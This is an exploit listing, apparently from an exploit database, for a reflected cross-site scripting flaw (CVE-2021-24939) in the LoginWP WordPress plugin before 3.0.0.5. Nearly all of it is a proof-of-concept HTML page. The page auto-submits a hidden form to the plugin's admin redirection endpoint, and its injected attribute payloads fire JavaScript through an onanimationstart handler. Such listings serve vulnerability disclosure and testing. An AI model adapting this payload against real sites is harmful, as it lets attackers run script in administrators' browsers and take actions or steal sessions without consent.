Exploit for LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting CVE-2021-24939

Name: Exploit for LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting CVE-2021-24939
Rating: 5 (73 reviews)

2021-11-08 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1" id="hack" method="POST">
      <input type="hidden" name="rul_login_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />
      <input type="hidden" name="rul_logout_url" value='" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>